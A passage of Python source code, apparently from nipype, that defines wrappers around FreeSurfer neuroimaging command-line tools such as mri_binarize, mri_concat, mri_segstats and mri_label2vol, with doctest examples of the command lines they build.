outputs["ftest_file"] = [os.path.join(glmdir, c, "F.mgh") for c in contrasts]
outputs["gamma_file"] = [os.path.join(glmdir, c, "gamma.mgh") for c in contrasts]
outputs["gamma_var_file"] = [os.path.join(glmdir, c, "gammavar.mgh") for c in contrasts]
# Add in the PCA results, if relevant
if isdefined(self.inputs.pca) and self.inputs.pca:
pcadir = os.path.join(glmdir, "pca-eres")
outputs["spatial_eigenvectors"] = os.path.join(pcadir, "v.mgh")
outputs["frame_eigenvectors"] = os.path.join(pcadir, "u.mtx")
outputs["singluar_values"] = os.path.join(pcadir, "sdiag.mat")
outputs["svd_stats_file"] = os.path.join(pcadir, "stats.dat")
return outputs
def _gen_filename(self, name):
if name == 'glm_dir':
return os.getcwd()
return None
class OneSampleTTest(GLMFit):
def __init__(self, **kwargs):
super(OneSampleTTest, self).__init__(**kwargs)
self.inputs.one_sample = True
class BinarizeInputSpec(FSTraitedSpec):
in_file = File(exists=True, argstr='--i %s', mandatory=True,
copyfile=False, desc='input volume')
min = traits.Float(argstr='--min %f', xor=['wm_ven_csf'],
desc='min thresh')
max = traits.Float(argstr='--max %f', xor=['wm_ven_csf'],
desc='max thresh')
rmin = traits.Float(argstr='--rmin %f',
desc='compute min based on rmin*globalmean')
rmax = traits.Float(argstr='--rmax %f',
desc='compute max based on rmax*globalmean')
match = traits.List(traits.Int, argstr='--match %d...',
desc='match instead of threshold')
wm = traits.Bool(argstr='--wm',
desc='set match vals to 2 and 41 (aseg for cerebral WM)')
ventricles = traits.Bool(argstr='--ventricles',
desc='set match vals those for aseg ventricles+choroid (not 4th)')
wm_ven_csf = traits.Bool(argstr='--wm+vcsf', xor=['min', 'max'],
desc='WM and ventricular CSF, including choroid (not 4th)')
binary_file = File(argstr='--o %s', genfile=True,
desc='binary output volume')
out_type = traits.Enum('nii', 'nii.gz', 'mgz', argstr='',
desc='output file type')
count_file = traits.Either(traits.Bool, File,
argstr='--count %s',
desc='save number of hits in ascii file (hits, ntotvox, pct)')
bin_val = traits.Int(argstr='--binval %d',
desc='set vox within thresh to val (default is 1)')
bin_val_not = traits.Int(argstr='--binvalnot %d',
desc='set vox outside range to val (default is 0)')
invert = traits.Bool(argstr='--inv',
desc='set binval=0, binvalnot=1')
frame_no = traits.Int(argstr='--frame %s',
desc='use 0-based frame of input (default is 0)')
merge_file = File(exists=True, argstr='--merge %s',
desc='merge with mergevol')
mask_file = File(exists=True, argstr='--mask maskvol',
desc='must be within mask')
mask_thresh = traits.Float(argstr='--mask-thresh %f',
desc='set thresh for mask')
abs = traits.Bool(argstr='--abs',
desc='take abs of invol first (ie, make unsigned)')
bin_col_num = traits.Bool(argstr='--bincol',
desc='set binarized voxel value to its column number')
zero_edges = traits.Bool(argstr='--zero-edges',
desc='zero the edge voxels')
zero_slice_edge = traits.Bool(argstr='--zero-slice-edges',
desc='zero the edge slice voxels')
dilate = traits.Int(argstr='--dilate %d',
desc='niters: dilate binarization in 3D')
erode = traits.Int(argstr='--erode %d',
desc='nerode: erode binarization in 3D (after any dilation)')
erode2d = traits.Int(argstr='--erode2d %d',
desc='nerode2d: erode binarization in 2D (after any 3D erosion)')
class BinarizeOutputSpec(TraitedSpec):
binary_file = File(exists=True, desc='binarized output volume')
count_file = File(desc='ascii file containing number of hits')
class Binarize(FSCommand):
"""Use FreeSurfer mri_binarize to threshold an input volume
Examples
--------
>>> binvol = Binarize(in_file='structural.nii', min=10, binary_file='foo_out.nii')
>>> binvol.cmdline
'mri_binarize --o foo_out.nii --i structural.nii --min 10.000000'
"""
_cmd = 'mri_binarize'
input_spec = BinarizeInputSpec
output_spec = BinarizeOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outfile = self.inputs.binary_file
if not isdefined(outfile):
if isdefined(self.inputs.out_type):
outfile = fname_presuffix(self.inputs.in_file,
newpath=os.getcwd(),
suffix='.'.join(('_thresh',
self.inputs.out_type)),
use_ext=False)
else:
outfile = fname_presuffix(self.inputs.in_file,
newpath=os.getcwd(),
suffix='_thresh')
outputs['binary_file'] = os.path.abspath(outfile)
value = self.inputs.count_file
if isdefined(value):
if isinstance(value, bool):
if value:
outputs['count_file'] = fname_presuffix(self.inputs.in_file,
suffix='_count.txt',
newpath=os.getcwd(),
use_ext=False)
else:
outputs['count_file'] = value
return outputs
def _format_arg(self, name, spec, value):
if name == 'count_file':
if isinstance(value, bool):
fname = self._list_outputs()[name]
else:
fname = value
return spec.argstr % fname
if name == 'out_type':
return ''
return super(Binarize, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
if name == 'binary_file':
return self._list_outputs()[name]
return None
class ConcatenateInputSpec(FSTraitedSpec):
in_files = InputMultiPath(File(exists=True),
desc='Individual volumes to be concatenated',
argstr='--i %s...', mandatory=True)
concatenated_file = File(desc='Output volume', argstr='--o %s',
genfile=True)
sign = traits.Enum('abs', 'pos', 'neg', argstr='--%s',
desc='Take only pos or neg voxles from input, or take abs')
stats = traits.Enum('sum', 'var', 'std', 'max', 'min', 'mean', argstr='--%s',
desc='Compute the sum, var, std, max, min or mean of the input volumes')
paired_stats = traits.Enum('sum', 'avg', 'diff', 'diff-norm', 'diff-norm1',
'diff-norm2', argstr='--paired-%s',
desc='Compute paired sum, avg, or diff')
gmean = traits.Int(argstr='--gmean %d',
desc='create matrix to average Ng groups, Nper=Ntot/Ng')
mean_div_n = traits.Bool(argstr='--mean-div-n',
desc='compute mean/nframes (good for var)')
multiply_by = traits.Float(argstr='--mul %f',
desc='Multiply input volume by some amount')
add_val = traits.Float(argstr='--add %f',
desc='Add some amount to the input volume')
multiply_matrix_file = File(exists=True, argstr='--mtx %s',
desc='Multiply input by an ascii matrix in file')
combine = traits.Bool(argstr='--combine',
desc='Combine non-zero values into single frame volume')
keep_dtype = traits.Bool(argstr='--keep-datatype',
desc='Keep voxelwise precision type (default is float')
max_bonfcor = traits.Bool(argstr='--max-bonfcor',
desc='Compute max and bonferroni correct (assumes -log10(ps))')
max_index = traits.Bool(argstr='--max-index',
desc='Compute the index of max voxel in concatenated volumes')
mask_file = File(exists=True, argstr='--mask %s', desc='Mask input with a volume')
vote = traits.Bool(argstr='--vote',
desc='Most frequent value at each voxel and fraction of occurances')
sort = traits.Bool(argstr='--sort',
desc='Sort each voxel by ascending frame value')
class ConcatenateOutputSpec(TraitedSpec):
concatenated_file = File(exists=True,
desc='Path/name of the output volume')
class Concatenate(FSCommand):
"""Use Freesurfer mri_concat to combine several input volumes
into one output volume. Can concatenate by frames, or compute
a variety of statistics on the input volumes.
Examples
--------
Combine two input volumes into one volume with two frames
>>> concat = Concatenate()
>>> concat.inputs.in_files = ['cont1.nii', 'cont2.nii']
>>> concat.inputs.concatenated_file = 'bar.nii'
>>> concat.cmdline
'mri_concat --o bar.nii --i cont1.nii --i cont2.nii'
"""
_cmd = 'mri_concat'
input_spec = ConcatenateInputSpec
output_spec = ConcatenateOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
if not isdefined(self.inputs.concatenated_file):
outputs['concatenated_file'] = os.path.join(os.getcwd(),
'concat_output.nii.gz')
else:
outputs['concatenated_file'] = self.inputs.concatenated_file
return outputs
def _gen_filename(self, name):
if name == 'concatenated_file':
return self._list_outputs()[name]
return None
class SegStatsInputSpec(FSTraitedSpec):
_xor_inputs = ('segmentation_file', 'annot', 'surf_label')
segmentation_file = File(exists=True, argstr='--seg %s', xor=_xor_inputs,
mandatory=True, desc='segmentation volume path')
annot = traits.Tuple(traits.Str, traits.Enum('lh', 'rh'), traits.Str,
argstr='--annot %s %s %s', xor=_xor_inputs,
mandatory=True,
desc='subject hemi parc : use surface parcellation')
surf_label = traits.Tuple(traits.Str, traits.Enum('lh', 'rh'), traits.Str,
argstr='--slabel %s %s %s', xor=_xor_inputs,
mandatory=True,
desc='subject hemi label : use surface label')
summary_file = File(argstr='--sum %s', genfile=True,
desc='Segmentation stats summary table file')
partial_volume_file = File(exists=True, argstr='--pv %s',
desc='Compensate for partial voluming')
in_file = File(exists=True, argstr='--i %s',
desc='Use the segmentation to report stats on this volume')
frame = traits.Int(argstr='--frame %d',
desc='Report stats on nth frame of input volume')
multiply = traits.Float(argstr='--mul %f', desc='multiply input by val')
calc_snr = traits.Bool(argstr='--snr', desc='save mean/std as extra column in output table')
calc_power = traits.Enum('sqr', 'sqrt', argstr='--%s',
desc='Compute either the sqr or the sqrt of the input')
_ctab_inputs = ('color_table_file', 'default_color_table', 'gca_color_table')
color_table_file = File(exists=True, argstr='--ctab %s', xor=_ctab_inputs,
desc='color table file with seg id names')
default_color_table = traits.Bool(argstr='--ctab-default', xor=_ctab_inputs,
desc='use $FREESURFER_HOME/FreeSurferColorLUT.txt')
gca_color_table = File(exists=True, argstr='--ctab-gca %s', xor=_ctab_inputs,
desc='get color table from GCA (CMA)')
segment_id = traits.List(argstr='--id %s...', desc='Manually specify segmentation ids')
exclude_id = traits.Int(argstr='--excludeid %d', desc='Exclude seg id from report')
exclude_ctx_gm_wm = traits.Bool(argstr='--excl-ctxgmwm',
desc='exclude cortical gray and white matter')
wm_vol_from_surf = traits.Bool(argstr='--surf-wm-vol', desc='Compute wm volume from surf')
cortex_vol_from_surf = traits.Bool(argstr='--surf-ctx-vol', desc='Compute cortex volume from surf')
non_empty_only = traits.Bool(argstr='--nonempty', desc='Only report nonempty segmentations')
empty = traits.Bool(argstr="--empty", mandatory=False,
desc="Report on segmentations listed in the color table")
mask_file = File(exists=True, argstr='--mask %s',
desc='Mask volume (same size as seg')
mask_thresh = traits.Float(argstr='--maskthresh %f',
desc='binarize mask with this threshold <0.5>')
mask_sign = traits.Enum('abs', 'pos', 'neg', '--masksign %s',
desc='Sign for mask threshold: pos, neg, or abs')
mask_frame = traits.Int('--maskframe %d',
requires=['mask_file'],
desc='Mask with this (0 based) frame of the mask volume')
mask_invert = traits.Bool(argstr='--maskinvert', desc='Invert binarized mask volume')
mask_erode = traits.Int(argstr='--maskerode %d', desc='Erode mask by some amount')
brain_vol = traits.Enum('brain-vol-from-seg', 'brainmask', argstr='--%s',
desc='Compute brain volume either with ``brainmask`` or ``brain-vol-from-seg``')
brainmask_file = File(argstr="--brainmask %s", exists=True,
desc="Load brain mask and compute the volume of the brain as the non-zero voxels in this volume")
etiv = traits.Bool(argstr='--etiv', desc='Compute ICV from talairach transform')
etiv_only = traits.Enum('etiv', 'old-etiv', '--%s-only',
desc='Compute etiv and exit. Use ``etiv`` or ``old-etiv``')
avgwf_txt_file = traits.Either(traits.Bool, File, argstr='--avgwf %s',
desc='Save average waveform into file (bool or filename)')
avgwf_file = traits.Either(traits.Bool, File, argstr='--avgwfvol %s',
desc='Save as binary volume (bool or filename)')
sf_avg_file = traits.Either(traits.Bool, File, argstr='--sfavg %s',
desc='Save mean across space and time')
vox = traits.List(traits.Int, argstr='--vox %s',
desc='Replace seg with all 0s except at C R S (three int inputs)')
supratent = traits.Bool(argstr="--supratent",
desc="Undocumented input flag")
subcort_gm = traits.Bool(argstr="--subcortgray",
desc="Compute volume of subcortical gray matter")
total_gray = traits.Bool(argstr="--totalgray",
desc="Compute volume of total gray matter")
euler = traits.Bool(argstr="--euler",
desc="Write out number of defect holes in orig.nofix based on the euler number")
in_intensity = File(argstr="--in %s --in-intensity-name %s", mandatory=False,
desc="Undocumented input norm.mgz file")
intensity_units = traits.Enum('MR', argstr="--in-intensity-units %s",
requires=["in_intensity"], desc="Intensity units")
class SegStatsOutputSpec(TraitedSpec):
summary_file = File(exists=True, desc='Segmentation summary statistics table')
avgwf_txt_file = File(desc='Text file with functional statistics averaged over segs')
avgwf_file = File(desc='Volume with functional statistics averaged over segs')
sf_avg_file = File(desc='Text file with func statistics averaged over segs and framss')
class SegStats(FSCommand):
"""Use FreeSurfer mri_segstats for ROI analysis
Examples
--------
>>> import nipype.interfaces.freesurfer as fs
>>> ss = fs.SegStats()
>>> ss.inputs.annot = ('PWS04', 'lh', 'aparc')
>>> ss.inputs.in_file = 'functional.nii'
>>> ss.inputs.subjects_dir = '.'
>>> ss.inputs.avgwf_txt_file = './avgwf.txt'
>>> ss.inputs.summary_file = './summary.stats'
>>> ss.cmdline
'mri_segstats --annot PWS04 lh aparc --avgwf ./avgwf.txt --i functional.nii --sum ./summary.stats'
"""
_cmd = 'mri_segstats'
input_spec = SegStatsInputSpec
output_spec = SegStatsOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
if isdefined(self.inputs.summary_file):
outputs['summary_file'] = os.path.abspath(self.inputs.summary_file)
else:
outputs['summary_file'] = os.path.join(os.getcwd(), 'summary.stats')
suffices = dict(avgwf_txt_file='_avgwf.txt', avgwf_file='_avgwf.nii.gz',
sf_avg_file='sfavg.txt')
if isdefined(self.inputs.segmentation_file):
_, src = os.path.split(self.inputs.segmentation_file)
if isdefined(self.inputs.annot):
src = '_'.join(self.inputs.annot)
if isdefined(self.inputs.surf_label):
src = '_'.join(self.inputs.surf_label)
for name, suffix in list(suffices.items()):
value = getattr(self.inputs, name)
if isdefined(value):
if isinstance(value, bool):
outputs[name] = fname_presuffix(src, suffix=suffix,
newpath=os.getcwd(),
use_ext=False)
else:
outputs[name] = os.path.abspath(value)
return outputs
def _format_arg(self, name, spec, value):
if name in ['avgwf_txt_file', 'avgwf_file', 'sf_avg_file']:
if isinstance(value, bool):
fname = self._list_outputs()[name]
else:
fname = value
return spec.argstr % fname
elif name == 'in_intensity':
intensity_name = os.path.basename(
self.inputs.in_intensity).replace('.mgz', '')
return spec.argstr % (value, intensity_name)
return super(SegStats, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
if name == 'summary_file':
return self._list_outputs()[name]
return None
class SegStatsReconAllInputSpec(SegStatsInputSpec):
# recon-all input requirements
subject_id = traits.String(argstr="--subject %s", mandatory=True,
desc="Subject id being processed")
ribbon = traits.File(mandatory=True, exists=True,
desc="Input file mri/ribbon.mgz")
presurf_seg = File(mandatory=True, exists=True,
desc="Input segmentation volume")
transform = File(mandatory=True, exists=True,
desc="Input transform file")
lh_orig_nofix = File(mandatory=True, exists=True,
desc="Input lh.orig.nofix")
rh_orig_nofix = File(mandatory=True, exists=True,
desc="Input rh.orig.nofix")
lh_white = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/lh.white")
rh_white = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/rh.white")
lh_pial = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/lh.pial")
rh_pial = File(mandatory=True, exists=True,
desc="Input file must be <subject_id>/surf/rh.pial")
class SegStatsReconAll(SegStats):
"""
This class inherits SegStats to and modifies it for use in a recon-all workflow.
This implementation mandates implicit inputs that SegStats does make mandatory
and to ensure backwards compatability of SegStats, this class was created.
Examples ========
>>> from nipype.interfaces.freesurfer import SegStatsReconAll
>>> segstatsreconall = SegStatsReconAll()
>>> segstatsreconall.inputs.annot = ('PWS04', 'lh', 'aparc')
>>> segstatsreconall.inputs.avgwf_txt_file = './avgwf.txt'
>>> segstatsreconall.inputs.summary_file = './summary.stats'
>>> segstatsreconall.inputs.subject_id = '10335'
>>> segstatsreconall.inputs.ribbon = 'wm.mgz'
>>> segstatsreconall.inputs.transform = 'trans.mat'
>>> segstatsreconall.inputs.presurf_seg = 'wm.mgz'
>>> segstatsreconall.inputs.lh_orig_nofix = 'lh.pial'
>>> segstatsreconall.inputs.rh_orig_nofix = 'lh.pial'
>>> segstatsreconall.inputs.lh_pial = 'lh.pial'
>>> segstatsreconall.inputs.rh_pial = 'lh.pial'
>>> segstatsreconall.inputs.lh_white = 'lh.pial'
>>> segstatsreconall.inputs.rh_white = 'lh.pial'
>>> segstatsreconall.inputs.empty = True
>>> segstatsreconall.inputs.brain_vol = 'brain-vol-from-seg'
>>> segstatsreconall.inputs.exclude_ctx_gm_wm = True
>>> segstatsreconall.inputs.supratent = True
>>> segstatsreconall.inputs.subcort_gm = True
>>> segstatsreconall.inputs.etiv = True
>>> segstatsreconall.inputs.wm_vol_from_surf = True
>>> segstatsreconall.inputs.cortex_vol_from_surf = True
>>> segstatsreconall.inputs.total_gray = True
>>> segstatsreconall.inputs.euler = True
>>> segstatsreconall.inputs.exclude_id = 0
>>> segstatsreconall.cmdline
'mri_segstats --annot PWS04 lh aparc --avgwf ./avgwf.txt --brain-vol-from-seg --surf-ctx-vol --empty --etiv --euler --excl-ctxgmwm --excludeid 0 --subcortgray --subject 10335 --sum ./summary.stats --supratent --totalgray --surf-wm-vol'
"""
input_spec = SegStatsReconAllInputSpec
output_spec = SegStatsOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
if isdefined(self.inputs.summary_file):
outputs['summary_file'] = os.path.abspath(self.inputs.summary_file)
elif isdefined(self.inputs.segmentation_file) and isdefined(self.inputs.subjects_dir):
basename = os.path.basename(
self.inputs.segmentation_file).replace('.mgz', '.stats')
outputs['summary_file'] = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'stats', basename)
else:
outputs['summary_file'] = os.path.join(
os.getcwd(), 'summary.stats')
suffices = dict(avgwf_txt_file='_avgwf.txt', avgwf_file='_avgwf.nii.gz',
sf_avg_file='sfavg.txt')
if isdefined(self.inputs.segmentation_file):
_, src = os.path.split(self.inputs.segmentation_file)
if isdefined(self.inputs.annot):
src = '_'.join(self.inputs.annot)
if isdefined(self.inputs.surf_label):
src = '_'.join(self.inputs.surf_label)
for name, suffix in suffices.items():
value = getattr(self.inputs, name)
if isdefined(value):
if isinstance(value, bool):
outputs[name] = fname_presuffix(src, suffix=suffix,
newpath=os.getcwd(),
use_ext=False)
else:
outputs[name] = os.path.abspath(value)
return outputs
class Label2VolInputSpec(FSTraitedSpec):
label_file = InputMultiPath(File(exists=True), argstr='--label %s...',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
copyfile=False,
mandatory=True,
desc='list of label files')
annot_file = File(exists=True, argstr='--annot %s',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
requires=('subject_id', 'hemi'),
mandatory=True,
copyfile=False,
desc='surface annotation file')
seg_file = File(exists=True, argstr='--seg %s',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
mandatory=True,
copyfile=False,
desc='segmentation file')
aparc_aseg = traits.Bool(argstr='--aparc+aseg',
xor=('label_file', 'annot_file', 'seg_file', 'aparc_aseg'),
mandatory=True,
desc='use aparc+aseg.mgz in subjectdir as seg')
template_file = File(exists=True, argstr='--temp %s', mandatory=True,
desc='output template volume')
reg_file = File(exists=True, argstr='--reg %s',
xor=('reg_file', 'reg_header', 'identity'),
desc='tkregister style matrix VolXYZ = R*LabelXYZ')
reg_header = File(exists=True, argstr='--regheader %s',
xor=('reg_file', 'reg_header', 'identity'),
desc='label template volume')
identity = traits.Bool(argstr='--identity',
xor=('reg_file', 'reg_header', 'identity'),
desc='set R=I')
invert_mtx = traits.Bool(argstr='--invertmtx',
desc='Invert the registration matrix')
fill_thresh = traits.Range(0., 1., argstr='--fillthresh %.f',
desc='thresh : between 0 and 1')
label_voxel_volume = traits.Float(argstr='--labvoxvol %f',
desc='volume of each label point (def 1mm3)')
proj = traits.Tuple(traits.Enum('abs', 'frac'), traits.Float,
traits.Float, traits.Float,
argstr='--proj %s %f %f %f',
requires=('subject_id', 'hemi'),
desc='project along surface normal')
subject_id = traits.Str(argstr='--subject %s',
desc='subject id')
hemi = traits.Enum('lh', 'rh', argstr='--hemi %s',
desc='hemisphere to use lh or rh')
surface = traits.Str(argstr='--surf %s',
desc='use surface instead of white')
vol_label_file = File(argstr='--o %s', genfile=True,
desc='output volume')
label_hit_file = File(argstr='--hits %s',
desc='file with each frame is nhits for a label')
map_label_stat = File(argstr='--label-stat %s',
desc='map the label stats field into the vol')
native_vox2ras = traits.Bool(argstr='--native-vox2ras',
desc='use native vox2ras xform instead of tkregister-style')
class Label2VolOutputSpec(TraitedSpec):
vol_label_file = File(exists=True, desc='output volume')
class Label2Vol(FSCommand):
"""Make a binary volume from a Freesurfer label
Examples
--------
>>> binvol = Label2Vol(label_file='cortex.label', template_file='structural.nii', reg_file='register.dat', fill_thresh=0.5, vol_label_file='foo_out.nii')
>>> binvol.cmdline
'mri_label2vol --fillthresh 0 --label cortex.label --reg register.dat --temp structural.nii --o foo_out.nii'
"""
_cmd = 'mri_label2vol'
input_spec = Label2VolInputSpec
output_spec = Label2VolOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outfile = self.inputs.vol_label_file
if not isdefined(outfile):
for key in ['label_file', 'annot_file', 'seg_file']:
if isdefined(getattr(self.inputs, key)):
path = getattr(self.inputs, key)
if isinstance(path, list):
path = path[0]
_, src = os.path.split(path)
if isdefined(self.inputs.aparc_aseg):
src = 'aparc+aseg.mgz'
outfile = fname_presuffix(src, suffix='_vol.nii.gz',
newpath=os.getcwd(),
use_ext=False)
outputs['vol_label_file'] = outfile
return outputs
def _gen_filename(self, name):
if name == 'vol_label_file':
return self._list_outputs()[name]
return None
class MS_LDAInputSpec(FSTraitedSpec):
lda_labels = traits.List(traits.Int(), argstr='-lda %s', mandatory=True,
minlen=2, maxlen=2, sep=' ',
desc='pair of class labels to optimize')
weight_file = traits.File(argstr='-weight %s', mandatory=True,
desc='filename for the LDA weights (input or output)')
vol_synth_file = traits.File(exists=False, argstr='-synth %s',
mandatory=True,
desc=('filename for the synthesized output '
'volume'))
label_file = traits.File(exists=True, argstr='-label %s',
desc='filename of the label volume')
mask_file = traits.File(exists=True, argstr='-mask %s',
desc='filename of the brain mask volume')
shift = traits.Int(argstr='-shift %d',
desc='shift all values equal to the given value to zero')
conform = traits.Bool(argstr='-conform',
desc=('Conform the input volumes (brain mask '
'typically already conformed)'))
use_weights = traits.Bool(argstr='-W',
desc=('Use the weights from a previously '
'generated weight file'))
images = InputMultiPath(File(exists=True), argstr='%s', mandatory=True,
copyfile=False, desc='list of input FLASH images',
position=-1)
class MS_LDAOutputSpec(TraitedSpec):
weight_file = File(exists=True, desc='')
vol_synth_file = File(exists=True, desc='')
class MS_LDA(FSCommand):
"""Perform LDA reduction on the intensity space of an arbitrary # of FLASH images
Examples
--------
>>> grey_label = 2
>>> white_label = 3
>>> zero_value = 1
>>> optimalWeights = MS_LDA(lda_labels=[grey_label, white_label], \
label_file='label.mgz', weight_file='weights.txt', \
shift=zero_value, vol_synth_file='synth_out.mgz', \
conform=True, use_weights=True, \
images=['FLASH1.mgz', 'FLASH2.mgz', 'FLASH3.mgz'])
>>> optimalWeights.cmdline
'mri_ms_LDA -conform -label label.mgz -lda 2 3 -shift 1 -W -synth synth_out.mgz -weight weights.txt FLASH1.mgz FLASH2.mgz FLASH3.mgz'
"""
_cmd = 'mri_ms_LDA'
input_spec = MS_LDAInputSpec
output_spec = MS_LDAOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.output_synth):
outputs['vol_synth_file'] = os.path.abspath(self.inputs.output_synth)
else:
outputs['vol_synth_file'] = os.path.abspath(self.inputs.vol_synth_file)
if not isdefined(self.inputs.use_weights) or self.inputs.use_weights is False:
outputs['weight_file'] = os.path.abspath(self.inputs.weight_file)
return outputs
def _verify_weights_file_exists(self):
if not os.path.exists(os.path.abspath(self.inputs.weight_file)):
raise traits.TraitError("MS_LDA: use_weights must accompany an existing weights file")
def _format_arg(self, name, spec, value):
if name is 'use_weights':
if self.inputs.use_weights is True:
self._verify_weights_file_exists()
else:
return ''
# TODO: Fix bug when boolean values are set explicitly to false
return super(MS_LDA, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
pass
class Label2LabelInputSpec(FSTraitedSpec):
hemisphere = traits.String(argstr="--hemi %s", mandatory=True,
desc="Input hemisphere")
subject_id = traits.String(argstr="--trgsubject %s", mandatory=True,
desc="Target subject")
label = traits.String(mandatory=True, desc="Input label name")
sphere_reg = File(mandatory=True, exists=True,
desc="Implicit input <hemisphere>.sphere.reg")
white = File(mandatory=True, exists=True,
desc="Implicit input <hemisphere>.white")
# optional
source_subject = traits.String(argstr="--srcsubject %s", mandatory=False, genfile=True,
desc="Source subject")
source_label = File(argstr="--srclabel %s", mandatory=False, genfile=True, exists=True,
desc="Source label")
target_label = File(argstr="--trglabel %s", mandatory=False, genfile=True,
desc="Source label")
registration_method = traits.String(argstr="--regmethod %s", mandatory=False, genfile=True,
desc="Target subject")
threshold = traits.Bool(
mandatory=False, desc="Specifies whether source label should be the threshold label")
class Label2LabelOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='Output label')
class Label2Label(FSCommand):
"""
Converts a label in one subject's space to a label
in another subject's space using either talairach or spherical
as an intermediate registration space.
If a source mask is used, then the input label must have been
created from a surface (ie, the vertex numbers are valid). The
format can be anything supported by mri_convert or curv or paint.
Vertices in the source label that do not meet threshold in the
mask will be removed from the label.
Examples
--------
>>> from nipype.interfaces.freesurfer import Label2Label
>>> l2l = Label2Label()
>>> l2l.inputs.hemisphere = 'lh'
>>> l2l.inputs.subject_id = '10335'
>>> l2l.inputs.label = 'fsaverage'
>>> l2l.inputs.sphere_reg = 'lh.pial'
>>> l2l.inputs.white = 'lh.pial'
>>> l2l.inputs.source_label = 'aseg.mgz'
>>> l2l.inputs.target_label = 'lh.aparc.label'
>>> l2l.cmdline
'mri_label2label --hemi lh --regmethod surface --srclabel aseg.mgz --srcsubject fsaverage --trgsubject 10335 --trglabel lh.aparc.label'
"""
_cmd = 'mri_label2label'
input_spec = Label2LabelInputSpec
output_spec = Label2LabelOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.target_label):
outputs['out_file'] = self.inputs.target_label
else:
out_dir = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'label')
if self.inputs.threshold:
basename = self.inputs.hemisphere + '.' + \
self.inputs.label + '_exvivo.thresh.label'
else:
basename = self.inputs.hemisphere + '.' + self.inputs.label + '_exvivo.label'
outputs['out_file'] = os.path.join(out_dir, basename)
return outputs
def _gen_filename(self, name):
# deterimine source subject
if not isdefined(self.inputs.source_subject):
# by default, the source subject is 'fsaverage'
src_subject = 'fsaverage'
else:
src_subject = self.inputs.source_subject
# if generating the source subject string
if name == 'source_subject':
return src_subject
# if generating the source label
elif name == 'source_label':
# source label will be locaed in the source subject directory
fsaverage = os.path.join(self.inputs.subjects_dir, src_subject)
# if this directory doesn't exist, we need to create it
if not os.path.isdir(fsaverage):
fs_home = os.path.abspath(os.environ.get('FREESURFER_HOME'))
fsaverage_home = os.path.join(fs_home, 'subjects', 'fsaverage')
# Create a symlink
os.symlink(fsaverage_home, fsaverage)
# input label will be different depending on the whether it is a
# threshold or not
if self.inputs.threshold:
basename = self.inputs.hemisphere + '.' + \
self.inputs.label + '_exvivo.thresh.label'
else:
basename = self.inputs.hemisphere + '.' + self.inputs.label + '_exvivo.label'
return os.path.join(fsaverage, 'label', basename)
elif name == 'target_label':
return self._list_outputs()['out_file']
elif name == 'registration_method':
return 'surface'
else:
return None
class Label2AnnotInputSpec(FSTraitedSpec):
# required
hemisphere = traits.String(argstr="--hemi %s", mandatory=True,
desc="Input hemisphere")
subject_id = traits.String(argstr="--s %s", mandatory=True,
desc="Subject name/ID")
in_labels = traits.List(argstr="--l %s...", mandatory=True,
desc="List of input label files")
out_annot = traits.String(argstr="--a %s", mandatory=True,
desc="Name of the annotation to create")
# optional
keep_max = traits.Bool(argstr="--maxstatwinner", mandatory=False,
desc="Keep label with highest 'stat' value")
verbose_off = traits.Bool(argstr="--noverbose", mandatory=False,
desc="Turn off overlap and stat override messages")
color_table = File(argstr="--ctab %s", mandatory=False, exists=True,
desc="File that defines the structure names, their indices, and their color")
class Label2AnnotOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='Output annotation file')
class Label2Annot(FSCommand):
"""
Converts a set of surface labels to an annotation file
Examples
--------
>>> from nipype.interfaces.freesurfer import Label2Annot
>>> l2a = Label2Annot()
>>> l2a.inputs.hemisphere = 'lh'
>>> l2a.inputs.subject_id = '10335'
>>> l2a.inputs.in_labels = ['lh.aparc.label']
>>> l2a.inputs.out_annot = 'test'
>>> l2a.cmdline
'mris_label2annot --hemi lh --l lh.aparc.label --a test --s 10335'
"""
_cmd = 'mris_label2annot'
input_spec = Label2AnnotInputSpec
output_spec = Label2AnnotOutputSpec
def _format_arg(self, name, spec, value):
if name == 'out_annot':
# this program will crash if the output annotation file already exists
# To prevent this, the file is deleted prior to running.
if os.path.isfile(self._list_outputs()['out_file']):
os.remove(self._list_outputs()['out_file'])
return super(Label2Annot, self)._format_arg(name, spec, value)
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = os.path.join(self.inputs.subjects_dir,
self.inputs.subject_id,
'label',
self.inputs.hemisphere + '.' + self.inputs.out_annot + '.annot')
return outputs
class SphericalAverageInputSpec(FSTraitedSpec):
out_file = File(argstr="%s", genfile=True, exists=False,
position=-1, desc="Output filename")
in_average = traits.Directory(argstr="%s", exists=True, genfile=True,
position=-2, desc="Average subject")
in_surf = File(argstr="%s", mandatory=True, exists=True,
position=-3, desc="Input surface file")
hemisphere = traits.Enum('lh', 'rh', argstr="%s", mandatory=True,
position=-4, desc="Input hemisphere")
fname = traits.String(argstr="%s", mandatory=True, position=-5,
desc="""Filename from the average subject directory.
Example: to use rh.entorhinal.label as the input label
filename, set fname to 'rh.entorhinal' and which to
'label'. The program will then search for
'{in_average}/label/rh.entorhinal.label'
""")
which = traits.Enum('coords', 'label', 'vals', 'curv', 'area',
argstr="%s", mandatory=True, position=-6, desc="No documentation")
subject_id = traits.String(
argstr="-o %s", mandatory=True, desc="Output subject id")
# optional
erode = traits.Int(argstr="-erode %d", desc="Undocumented")
in_orig = File(argstr="-orig %s", exists=True,
desc="Original surface filename")
threshold = traits.Float(argstr="-t %.1f", desc="Undocumented")
class SphericalAverageOutputSpec(TraitedSpec):
